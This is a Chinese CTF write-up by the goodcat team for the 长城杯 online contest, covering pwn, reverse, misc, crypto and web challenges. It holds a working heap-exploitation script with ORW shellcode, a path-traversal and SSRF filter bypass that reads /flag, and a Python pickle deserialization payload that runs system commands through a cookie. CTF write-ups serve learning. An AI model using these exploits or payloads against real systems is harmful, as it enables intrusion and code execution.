zoukankan html css js c++ java

长城杯线上赛wp

注：本文为goodcat战队参赛wp，非官方出品

Pwn

1、K1ng_in_h3Ap_II

libc2.27-0ubuntu1.4，存在明显的UAF；

tcahce double free 控制tcache struct，将counts[]数组全部填满后，将其释放到unsortedbin可泄露libc；

之后再次double free 将free_hook改为setcontext，布置好orw，之后读出flag。

from pwn import*

context.log_level = "debug"
context.os = "linux"
context.arch = "amd64"
context.terminal = ['tmux', 'splitw', '-h']

#r = process("./pwn2")
r = remote("47.104.175.110", 61608)
libc = ELF("./libc.so.6")

def allocate(index, size):
    r.sendlineafter(">> 
", "1")
    r.sendlineafter("input index:
", str(index))
    r.sendlineafter("input size:
", str(size))

def delete(index):
    r.sendlineafter(">> 
", "2")
    r.sendlineafter("input index:
", str(index))

def edit(index, content):
    r.sendlineafter(">> 
", "3")
    r.sendlineafter("input index:
", str(index))
    r.sendafter("input context:
", content)

def show(index):
    r.sendlineafter(">> 
", "4")
    r.sendlineafter("input index:
", str(index))

for i in range(8):
    allocate(0, 0x10)
allocate(0, 0x40)
for i in range(7):
    allocate(0, 0x60)

allocate(0, 0x60)
delete(0)
edit(0, 'a' * 0x10)
delete(0)

show(0)
heap_addr = u64(r.recv(6) + 'x00x00') & 0xfffffffffffff000
print "heap_addr = " + hex(heap_addr)

edit(0, p64(heap_addr+0x10))

allocate(0, 0x60)
allocate(0, 0x60)

edit(0, 'a' * 64)
delete(0)

show(0)
malloc_hook = (u64(r.recvuntil('x7f')[-6:].ljust(8, "x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
set_context = libc_base + libc.symbols['setcontext']
mprotect = libc_base + libc.sym['mprotect']
print "libc_base = " + hex(libc_base)
print "mprotect = " + hex(mprotect)
allocate(0, 0x58)

edit(0, 'x00' * 0x58)

allocate(1, 0x38)
delete(1)

edit(1, p64(free_hook))
allocate(1, 0x38)
allocate(1, 0x38)

allocate(2, 0x30)
allocate(2, 0x30)
allocate(2, 0x30)
allocate(2, 0x30)
allocate(3, 0x10)
allocate(4, 0x30)
allocate(5, 0x30)

new_addr =  free_hook &0xFFFFFFFFFFFFF000
shellcode1 = '''
xor rdi,rdi
mov rsi,%d
mov edx,0x1000

mov eax,0
syscall

jmp rsi
''' % new_addr
edit(1, p64(set_context+53) + p64(free_hook+0x10) + asm(shellcode1))

edit(4, p64(0) + p64(new_addr) + p64(0x1000) + p64(0) + p64(0) + p64(7))
edit(5, p64(free_hook + 0x8) + p64(mprotect))


delete(2)


sleep(0.5)

shellcode2 = '''
mov rax, 0x67616c662f ;// /flag
push rax

mov rdi, rsp ;// /flag
mov rsi, 0 ;// O_RDONLY
xor rdx, rdx ;
mov rax, 2 ;// SYS_open
syscall

mov rdi, rax ;// fd 
mov rsi,rsp  ;
mov rdx, 1024 ;// nbytes
mov rax,0 ;// SYS_read
syscall

mov rdi, 1 ;// fd 
mov rsi, rsp ;// buf
mov rdx, rax ;// count 
mov rax, 1 ;// SYS_write
syscall

mov rdi, 0 ;// error_code
mov rax, 60
syscall
'''
r.sendline(asm(shellcode2))

r.interactive()

Re

1、Just_cmp-re|Solved| working:

find the cmp str.

buu原题

hook原文

将原文转成qword

与加密key相加得到flag

flag{a14a424005b14e2b89ed45031ea791b9}

2、Funny_js

根据题目名称，发现是一道js框架的题目

提取js字节码如下：

0x02, 0x1B, 0x06, 0x72, 0x63, 0x34, 0x04, 0x73, 0x6E, 0x02, 0x69, 0x02, 0x6A, 0x02, 0x6B, 0x02, 0x6C, 0x02, 0x6D, 0x02, 0x6E, 0x04, 0x75, 0x6E, 0x06, 0x61, 0x72, 0x72, 0x0C, 0x63, 0x69, 0x70, 0x68, 
0x65, 0x72, 0x2A, 0x32, 0x30, 0x32, 0x31, 0x71, 0x75, 0x69, 0x63, 0x6B, 0x6A, 0x73, 0x5F, 0x68, 0x61, 0x70, 0x70, 0x79, 0x67, 0x61, 0x6D, 0x65, 0x48, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A,
 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x02, 0x73, 0x18, 0x66, 0x72, 
0x6F, 0x6D, 0x43, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x0A, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x12, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x2E, 0x6A, 0x73, 0x08, 0x64, 0x61, 0x74, 0x61, 0x06, 0x6B,
 0x65, 0x79, 0x06, 0x62, 0x6F, 0x78, 0x02, 0x78, 0x08, 0x74, 0x65, 0x6D, 0x70, 0x02, 0x79, 0x06, 0x6F, 0x75, 0x74, 0x08, 0x63, 0x6F, 0x64, 0x65, 0x14, 0x63, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65,
 0x41, 0x74, 0x08, 0x70, 0x75, 0x73, 0x68, 0x0E, 0x00, 0x06, 0x00, 0x9E, 0x01, 0x00, 0x01, 0x00, 0x20, 0x00, 0x08, 0xEB, 0x04, 0x01, 0xA0, 0x01, 0x00, 0x00, 0x00, 0x40, 0xDF, 0x00, 0x00, 0x00, 0x40, 
0x40, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE5, 0x00, 
0x00, 0x00, 0x00, 0x40, 0xE6, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00,
 0xC2, 0x00, 0x41, 0xDF, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x3F,
 0xE4, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE6, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE9, 0x00, 0x00, 
0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x04, 0xEA, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE7, 0x00, 0x00, 0x00, 0x0E, 0x04, 0xEB, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE0, 0x00, 0x00, 0x00, 0xCB, 0xC0, 
0x96, 0x00, 0xC0, 0xE0, 0x00, 0xC0, 0xF4, 0x00, 0xBF, 0x44, 0xBF, 0x3D, 0xBF, 0x7D, 0xBF, 0x08, 0xC0, 0xEF, 0x00, 0xC0, 0xCB, 0x00, 0xC0, 0xFE, 0x00, 0xC0, 0xF1, 0x00, 0xBF, 0x71, 0xC0, 0xD5, 0x00, 
0xC0, 0xB0, 0x00, 0xBF, 0x40, 0xBF, 0x6A, 0xBF, 0x67, 0xC0, 0xA6, 0x00, 0xC0, 0xB9, 0x00, 0xC0, 0x9F, 0x00, 0xC0, 0x9E, 0x00, 0xC0, 0xAC, 0x00, 0xBF, 0x09, 0xC0, 0xD5, 0x00, 0xC0, 0xEF, 0x00, 0xBF, 
0x0C, 0xBF, 0x64, 0xC0, 0xB9, 0x00, 0xBF, 0x5A, 0xC0, 0xAE, 0x00, 0xBF, 0x6B, 0xC0, 0x83, 0x00, 0x26, 0x20, 0x00, 0xC0, 0xDF, 0x00, 0x4D, 0x20, 0x00, 0x00, 0x80, 0xBF, 0x7A, 0x4D, 0x21, 0x00, 0x00, 
0x80, 0xC0, 0xE5, 0x00, 0x4D, 0x22, 0x00, 0x00, 0x80, 0xC0, 0x9D, 0x00, 0x4D, 0x23, 0x00, 0x00, 0x80, 0x11, 0x3A, 0xE8, 0x00, 0x00, 0x00, 0x0E, 0xC1, 0x01, 0x11, 0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 
0xC1, 0x02, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE4, 0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE3, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xDF, 0x00, 0x00, 0x00, 0x39, 0xE0, 0x00,
 0x00, 0x00, 0x39, 0xE7, 0x00, 0x00, 0x00, 0xF2, 0x11, 0x3A, 0xE9, 0x00, 0x00, 0x00, 0x0E, 0x06, 0xCB, 0xB7, 0x11, 0x3A, 0xE1, 0x00, 0x00, 0x00, 0x0E, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 
0x00, 0x00, 0xEB, 0xA5, 0xEC, 0x6E, 0x39, 0xE9, 0x00, 0x00, 0x00, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x48, 0x11, 0x3A, 0xE2, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE2, 0x00, 0x00, 0x00, 0xBF, 0x38, 0xBF, 0x11, 
0xA0, 0xB0, 0x11, 0x3A, 0xE4, 0x00, 0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE4, 0x00, 0x00, 0x00, 0x39, 0xE8, 0x00, 0x00, 0x00, 0x39, 0xE3, 0x00, 0x00, 0x00, 0x48, 0xAB, 0xEC, 0x0F, 0x39, 0xE5, 0x00,
 0x00, 0x00, 0x93, 0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0D, 0x39, 0xE6, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE3, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE3, 0x00, 0x00, 
0x00, 0xCB, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE1, 0x00, 0x00, 0x00, 0x0E, 0xEE, 0x86, 0x06, 0xCB, 0x39, 0xE5, 0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 0x00, 0x00, 0xEB, 0xAB, 0xEC, 0x15, 0x39, 
0xE6, 0x00, 0x00, 0x00, 0xB7, 0xAB, 0xEC, 0x0C, 0xC1, 0x03, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0A, 0xC1, 0x04, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xC3, 0x11, 0x3A, 0xEC, 0x00,
 0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x05, 0xA7, 0xEC, 0x3A, 0x39, 0xEC, 0x00, 0x00, 0x00, 0x39, 0x97, 0x00, 0x00, 0x00, 0x43, 0xED, 0x00, 0x00, 0x00, 0x39, 0x96, 0x00,
 0x00, 0x00, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x06, 0x9E, 0xF1, 0x24, 0x01, 0x00, 0x9F, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x07, 0x9D, 0x11, 0x3A, 0xE6,
 0x00, 0x00, 0x00, 0xCB, 0xEE, 0xBE, 0x39, 0xEE, 0x00, 0x00, 0x00, 0x39, 0xEC, 0x00, 0x00, 0x00, 0xF1, 0xCF, 0x28, 0xDE, 0x03, 0x01, 0x20, 0x00, 0x48, 0x01, 0x00, 0x4A, 0x52, 0x3F, 0x40, 0x00, 0x7C, 
0x04, 0x30, 0x30, 0x2B, 0x2B, 0x77, 0x7B, 0x5D, 0x5D, 0x6C, 0x3F, 0x0E, 0x40, 0x3F, 0x4A, 0xB7, 0x30, 0x2B, 0x3F, 0xCB, 0x4E, 0x0D, 0x0E, 0x43, 0x06, 0x00, 0xBE, 0x03, 0x02, 0x08, 0x02, 0x05, 0x00, 
0x00, 0xBB, 0x01, 0x0A, 0xE0, 0x03, 0x00, 0x01, 0x00, 0xE2, 0x03, 0x00, 0x01, 0x00, 0xE4, 0x03, 0x00, 0x00, 0x00, 0xC2, 0x03, 0x00, 0x01, 0x00, 0xE6, 0x03, 0x00, 0x02, 0x00, 0xE8, 0x03, 0x00, 0x03,
 0x00, 0xEA, 0x03, 0x00, 0x04, 0x00, 0xEC, 0x03, 0x00, 0x05, 0x00, 0xEE, 0x03, 0x00, 0x06, 0x00, 0xC6, 0x03, 0x00, 0x07, 0x00, 0x39, 0x94, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x01, 0xF1, 0xCB, 0xB7, 0xCC,
 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x09, 0xC7, 0xC8, 0xC8, 0x4A, 0x95, 0x01, 0xEE, 0xF2, 0xB7, 0xCD, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x2C, 0xC9, 0xC7, 0xC8, 0x48, 0x9F, 0xD4, 0x43,
 0xF8, 0x00, 0x00, 0x00, 0xC8, 0xD4, 0xEB, 0x9E, 0x24, 0x01, 0x00, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xCD, 0xC7, 0xC8, 0x48, 0xCE, 0xC7, 0xC8, 0x72, 0xC7, 0xC9, 0x48, 0x4A, 0xC7, 0xC9, 0xCA, 0x4A, 0x95,
 0x01, 0xEE, 0xCF, 0xB7, 0xCD, 0xB7, 0xC5, 0x04, 0x26, 0x00, 0x00, 0xC5, 0x05, 0xB7, 0xCC, 0xC8, 0xD3, 0xEB, 0xA5, 0xEC, 0x56, 0xD3, 0x43, 0xF8, 0x00, 0x00, 0x00, 0xC8, 0x24, 0x01, 0x00, 0xC5, 0x06, 
0xC9, 0xB8, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xCD, 0xC4, 0x04, 0xC7, 0xC9, 0x48, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xC5, 0x04, 0xC7, 0xC9, 0x48, 0xCE, 0xC7, 0xC9, 0x72, 0xC7, 0xC4, 0x04, 0x48, 0x4A, 0xC7, 
0xC4, 0x04, 0xCA, 0x4A, 0xC7, 0xC9, 0x48, 0xC7, 0xC4, 0x04, 0x48, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xC5, 0x07, 0xC4, 0x05, 0x43, 0xF9, 0x00, 0x00, 0x00, 0xC4, 0x06, 0xC7, 0xC4, 0x07, 0x48, 0xB0, 0x24,
 0x01, 0x00, 0x0E, 0x95, 0x01, 0xEE, 0xA6, 0xC4, 0x05, 0x28, 0xDE, 0x03, 0x03, 0x19, 0x04, 0x35, 0x30, 0x17, 0x18, 0x0D, 0x30, 0x7B, 0x17, 0x26, 0x17, 0x19, 0x0D, 0x12, 0x1C, 0x2C, 0x40, 0x2B, 0x3F,
 0x17, 0x2B, 0x1D, 0x4A, 0x5D, 0x17, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0xE8, 0x01, 0x07, 0x44, 0xB8, 0x90, 0xB5, 0x6B, 0x67, 0x80, 0x0A, 0xE8, 0x01, 0x07, 0x34, 0xA7, 0xB8, 0x48, 0x7F, 0x8D, 0xAF, 0x0A, 
0x00, 0x0A, 0x28, 0x01, 0xFE, 0x0A, 0x28, 0x01, 0xFE, 0x00, 0x00, 0x00

参考了这一篇博客

https://bbs.pediy.com/thread-259014.htm

对 quickjs.c 进行 patch：

得到字节码如下，对dump出来的字节码进行分析，提取出密文

[150, 224, 244, 68, 61, 125, 8, 239, 203, 254, 241, 113, 213, 176, 6

4, 106, 103, 166, 185, 159, 158, 172, 9, 213, 239, 12, 100, 185, 90, 174, 1

07, 131, 223, 122, 229, 157]

再提取出加密过程如下：

RC4_KEY="2021quickjs_happygame" 
push_i16 150 
push_i16 224 
push_i16 244 
push_i8 68 
push_i8 61 
push_i8 125 
push_i8 8 
push_i16 239 
push_i16 203 
push_i16 254 
push_i16 241 
push_i8 113 
push_i16 213 
push_i16 176 
push_i8 64 
push_i8 106 
push_i8 103
push_i16 166 
push_i16 185 
push_i16 159 
push_i16 158 
push_i16 172 
push_i8 9 
push_i16 213 
push_i16 239 
push_i8 12 
push_i8 100 
push_i16 185 
push_i8 90 
push_i16 174 
push_i8 107 
push_i16 131 
array_from 32 
push_i16 223 
define_field "32" 
push_i8 122 
define_field "33" 
push_i16 229 
define_field "34" 
push_i16 157 43 define_field "35"

加密过程就是一个异或(56-17)外加rc4（key为2021quickjs_happygameH）

解密得到flag为flag{2021_9u1ck_1s_v3r7_1nT3r3st1n9}

Misc

1、你这flag保熟吗

binwalk提取两张图片，分别得到一个字母数字混合的表格和一个hint.txt

password.xls

hint.txt

希尔伯格曲线取出表格中的字符，单独放到password.txt的文件中，运行脚本如下：

import base64
from hilbertcurve.hilbertcurve import HilbertCurve
array = []
password = ''
p = 8;n=2
hilbert_curve = HilbertCurve(p, n)
with open('password.txt','r',encoding='utf-16') as file:
    # a = file.readline().replace("	", "").replace("
", "")
    # print(a)
    for i in range(256):
        a = file.readline().replace("	", "").replace("
", "")
        array.append(a)
for i in range(256*256):
    [m,n] = hilbert_curve.point_from_distance(i)
    password += array[n][m]

# print(password)
import base64
temp = password
for i in range(25):
    temp = base64.b64decode(temp)
print(temp)

得到base64加密后的密文如下：

base解密得到密码

解压后发现里面是brainfuck

     >+++++++++[<+++++++++++++   >-]>+                      
                         ++[<                         
+++++++++++++++++++++++++++++

      ++++++++>-]>++[<+++++++++   +++++                        
                      ++++++                       
 +++++++++++++++++++++++++++++

      ++++++++++++>-]>++++[<+++   +++++                        
                     ++++++++                       
+++++++++++++>-]>+++[<+++++++
      +++++                       +++++                                            ++++  ++++                      +++++
      +++++                       +++++                                           +>-]    ++++                     +++++
      +++++                       +++++                                          ++++      ++++                    +++++
      +++++                       +++++                                         ++++        ++++                   +++++
      +++++                       +++++                                        ++++          ++++                  +++++

      +++++                       >>+++                            
           +++[            <+++                 +++++

      +++++                       +++++                                  
    +>-]              >++[                <++++

      +++++++++++++++++++++++++   +++++                                  
   +++++++>-]>+++++++++++[<               +++++       
 ++++++>-]>++[<++

      +++++++++++++++++++++++++   +++++                                  
  ++++++++++++++++++++++++++              +>-]>       
+++++++[<++++++++

      +++++++>-]+++++++++++++++   +++++                              
     ++++++++++++++++++++++++++++             +++++       +++         
+++++

      +++++                       +++++                                 
 ++++                      ++++            +++++                   +++++

      +++++                       +++++                                 
++++                        >>++           +++[<                
   +++++

      +++++                       +++++                               
 ++++                          >-]>          +++++                
   +++[<

      +++++                       +++++                               
+>-]                            >+++         +++[<              
     +++++

      +++++                       +++++                             
 ++>-                              ]>++        +++++              
     [<+++

      +++++                       +++++                             
++>-                                ]+++       +++++                  
 +++++

      +++++                       +++++++++++++++++++++++++++      ++++  
                                ++++      +++++++++++++++++++++++++++++

      +++++                       ++++++++++++++>>++[<+++++++  
   ++++                                    ++++     
+++++++++++++++++++++++++++++

      +++++                       ++++++++++>-]>+++++[<++++++  
  ++++                                      ++++   
 +++++>-]>+++++++[<+++++++>-]>
++++
                                                                        
                                                                     
 ++++
[<+++
                                                                        
                                                                   
 +++++
+>-]>+++++[<+++++++++++++++++++>-]>++++[<+++++++++++++>-]>+++++[<+++++++++++++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>++++++[<
++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>+++++++[<+++++++++++++++++>-
]>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>-]>+++++++[<+++++++++++++++>-]>+++++++++[<+++++++++++++>-]>++++++[<+++++++++++++++++
>-]>+++[<+++++++++++>-]>+++++[<+++++++++++++++++++>-]>++++++++++[<++++++++++++>-]>++++++[<+++++++++++++++++>-]>+++++++[<+++++++++++++++>-]++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++>-]>+++++[<+++++++++++++++++++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.>>+++
+++[<+++++++++++++++++++>-]<.>>++++++[<+++++++++++++++++++>-]<.>>+++[<+++++++++++++++++++++++++++++++++++++>-]<.>>++++++[<+++++++++++++++++++>-]<.>

然后解brainfuck可以得到

uozt{SrRyvig_Xfiev_1H_4_ee0mwviuf!_xfiev}

放到编码器里面发现是atbash

对应位置修改下大小写

flag{HiIbert_Curve_1S_4_vv0nderfu!_curve}

Crypto

1、 baby_rsa

to small? leak?

https://blog.cryptohack.org/cryptoctf2020#one-line-crypto

from Crypto.Util.number import long_to_bytes
from gmpy2 import invert, is_prime
from tqdm import tqdm

primes = []

for xy in tqdm(range(500)):
    for mn in range(500):
        prime = xy**(mn+1) - (xy+1)**mn
        if prime.bit_length() > 2048: break
        if is_prime(prime):
            primes.append(prime)

c = 15808773921165746378224649554032774095198531782455904169552223303513940968292896814159288417499220739875833754573943607047855256739976161598599903932981169979509871591999964856806929597805904134099901826858367778386342376768508031554802249075072366710038889306268806744179086648684738023073458982906066972340414398928411147970593935244077925448732772473619783079328351522269170879807064111318871074291073581343039389561175391039766936376267875184581643335916049461784753341115227515163545709454746272514827000601853735356551495685229995637483506735448900656885365353434308639412035003119516693303377081576975540948311

for i in range(len(primes)):
    for j in range(i, len(primes)):
        pq = primes[i]*primes[j]
        if len(bin(pq)[2:]) == 2048:
            try:
                d = invert(0x10001, (primes[i]-1)*(primes[j]-1))
                dec = long_to_bytes(pow(c, d, pq))
                if b"flag{" in dec:
                    print(dec)
            except ValueError:
                pass

已知((fac[0]+fac[1]+fac[2]) << 1) - 1的值，用其替代n。分解((fac[0]+fac[1]+fac[2]) << 1) - 1求其欧拉函数，进而求解出d和第二段。

import gmpy2
from Crypto.Util.number import *


def main():
    _n = 39796272592331896400626784951713239526857273168732133046667572399622660330587881579319314094557011554851873068389016629085963086136116425352535902598378739
    e = 0x10001
    c = 40625981017250262945230548450738951725566520252163410124565622126754739693681271649127104109038164852787767296403697462475459670540845822150397639923013223102912674748402427501588018866490878394678482061561521253365550029075565507988232729032055298992792712574569704846075514624824654127691743944112075703814043622599530496100713378696761879982542679917631570451072107893348792817321652593471794974227183476732980623835483991067080345184978482191342430627490398516912714451984152960348899589532751919272583098764118161056078536781341750142553197082925070730178092561314400518151019955104989790911460357848366016263083
    phi_n = (191 - 1) * (193 - 1) * (627383 - 1) * (1720754738477317127758682285465031939891059835873975157555031327070111123628789833299433549669619325160679719355338187877758311485785197492710491 - 1)
    d = gmpy2.invert(e, phi_n)
    m = pow(c % _n, d, _n)
    print(long_to_bytes(m))


if __name__ == '__main__':
    main()

###

Web

1、java_url

一道Java_URL。

Tomcat/8.5.71

http://eci-2zeb5ty7ty8rr8c0v8yy.cloudeci1.ichunqiu.com/

读 /../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF//web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>testurl</servlet-name>
        <servlet-class>com.test2.aaa1.testURL</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>testurl</servlet-name>
        <url-pattern>/testURL</url-pattern>
    </servlet-mapping>
    
    <servlet>
        <servlet-name>download</servlet-name>
        <servlet-class>com.test2.aaa1.download</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>download</servlet-name>
        <url-pattern>/download</url-pattern>
    </servlet-mapping>
</web-app>

读 /../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/com/test2/aaa1/testURL.class

得到class文件

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class testURL extends HttpServlet {
    protected void doGet(HttpServletRequest arg1, HttpServletResponse arg2) throws ServletException, IOException {
        this.doPost(arg1, arg2);
    }

    protected void doPost(HttpServletRequest arg6, HttpServletResponse arg7) throws ServletException, IOException {
        String tartget_url = arg6.getParameter("url");
        if(tartget_url.substring(0, tartget_url.indexOf(":")).matches("(?i)file|(?i)gopher|(?i)data")) {
            arg7.getWriter().write(String.valueOf(new StringBuilder().append("false")));
            return;
        }
        arg7.getWriter().write(String.valueOf(this.getContent(tartget_url)));
    }

    public StringBuilder getContent(String arg8) throws IOException {
        BufferedReader in = new BufferedReader(new InputStreamReader(new URL(arg8).openConnection().getInputStream()));
        StringBuilder content = new StringBuilder();
        while(true) {
            String inputLine = in.readLine();
            if(inputLine == null) {
                return content;
            }

            content.append(inputLine);
            content.append("
");
        }

        return content;
    }
}

读flag的payload /testURL?url=url:file:///flag

2、EZ_python

樱桃猫写了自己的第一个flask网站，你能帮他看看有什么问题吗？

网刃杯的easy_web,原题

文件读取，/proc/self/cmdline

app.py

import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file

app = Flask(__name__)

class User():
    def __init__(self,name,age):
        self.name = name
        self.age = age

def check(s):
    if b'R' in s:
        return 0
    return 1


@app.route("/")
def index():
    try:
        user = base64.b64decode(request.cookies.get('user'))
        if check(user):
            user = pickle.loads(user)
            username = user["username"]
        else:
            username = "bad,bad,hacker"
    except:
        username = "CTFer"
    pic = '{0}.jpg'.format(random.randint(1,7))
    
    try:
        pic=request.args.get('pic')
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()
    except:
        pic='{0}.jpg'.format(random.randint(1,7))
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()

    return render_template('index.html', uname=username, pic=p )


if __name__ == "__main__":
    app.run('0.0.0.0',port=8888)

读 /proc/self/environ 没用

MAIL=/var/mail/appUSER=appHOSTNAME=engine-1SHLVL=1PYTHON_PIP_VERSION=20.1HOME=/home/appGPG_KEY=E3FF2839C048B25C084DEBE9B26995E310250568LOGNAME=app_=/bin/suPYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/1fe530e9e3d800be94e04f6428460fc4fb94f5a9/get-pip.pyTERM=xtermPATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binLANG=C.UTF-8SHELL=/bin/shPYTHON_VERSION=3.8.2PWD=/appPYTHON_GET_PIP_SHA256=ce486cddac44e99496a702aa5c06c5028414ef48fdfd5242cd2fe559b13d4348

http://www.snowywar.top/?p=2538 网刃原题

import requests
import pickle
import base64


# e = 'ls / -a'
e = 'cat /flagggggggggggggaaa'
s = pickle.dumps(e)
# print(s)
payload = b'c__main__
User
)x81}(V__setstate__
cos
system
ubV' + 
    e.encode()+b' > /tmp/1.txt
b.'
response = requests.get("http://eci-2zecbk1aefg5marnfo77.cloudeci1.ichunqiu.com:8888/?pic=/tmp/1.txt",
cookies=dict(
    user=base64.b64encode(payload).decode()))
for l in response.content.decode().split("
"):
    if "base64" in l:
        l = l.split(""")[1].split(",")[1]
        print(base64.b64decode(l).decode())

flag{2e4af838-7d23-4b04-a77a-1519e8b14e8f}

合天智汇：合天网络靶场、网安实战虚拟环境

查看全文

相关阅读:
我的黑客偶像
 IEEE754浮点数
 罗马数字转化为阿拉伯数字
 2020-2021-1 20201221 《信息安全专业导论》第三周学习总结
 base64
2020-2021-1 20201221曾思源《第二周学习总结》
师生关系
 教材速读问题
 20201221曾思源自我介绍
 20201221 曾思源第一周学习总结

原文地址：https://www.cnblogs.com/hetianlab/p/15337781.html

热门文章
inotify + epoll实现热插拔检测
 LED子系统
 JNI中传数组与字符串
 andriod底层最简开发流程
 Andriod.mk
usb
mtd框架
 网卡驱动
 mmap专题
 LCD驱动